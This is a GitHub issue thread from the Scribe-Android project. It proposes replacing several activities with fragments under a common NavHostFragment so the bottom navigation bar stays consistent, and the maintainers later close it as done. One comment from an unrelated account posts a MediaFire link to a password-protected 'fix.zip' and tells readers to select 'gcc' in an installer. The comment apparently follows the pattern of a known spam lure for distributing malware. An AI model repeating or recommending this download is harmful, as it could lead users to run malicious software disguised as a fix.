### ISSUE TITLE
Convert Activities to Fragments and Set Up Common NavHostFragment

### ISSUE THREAD

**Issue by angrezichatterbox** [scribe-org/Scribe-Android#71]
### Terms

- [X] I have searched [open and closed feature requests](https://github.com/scribe-org/Scribe-Android/issues?q=is%3Aissue+label%3Afeature)
- [X] I agree to follow Scribe-Android's [Code of Conduct](https://github.com/scribe-org/Scribe-Android/blob/main/.github/CODE_OF_CONDUCT.md)

### Description

Currently, the application uses separate activities for different sections, each with its own bottom navigation bar. As a result, navigating between sections requires changing the entire content view and reconstructing the bottom navigation bar every time.

To improve this, We propose a refactor where the bottom navigation bar remains fixed and consistent across the app. Instead of multiple activities, we will convert each section into a fragment. This way, the content view will change according to the selected navigation item, while the bottom navigation bar remains unchanged. This approach will streamline navigation, enhance user experience, and reduce the overhead of recreating the navigation bar with each content switch.

This would help reduce inconsistencies in the bottom navigation bar sizes as well. 

The following activities would have been converted to a fragment 

- AboutActivity 
- LanguageSettings 
- MainActivity
- WikimediaScribeActivity
- SettingsActivity

There also might be other activities to be modified during the change. 

### Contribution

I will be happy to take on this issue and would also be willing to help anyone interested in solving this issue :).

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by angrezichatterbox** [comment]
I will be working on this issue.

**Comment by andrewtavis** [comment]
Closed by #74! 🚀 Really amazing work, @angrezichatterbox! Your ability to figure out what's needed and execute is really on display here :)
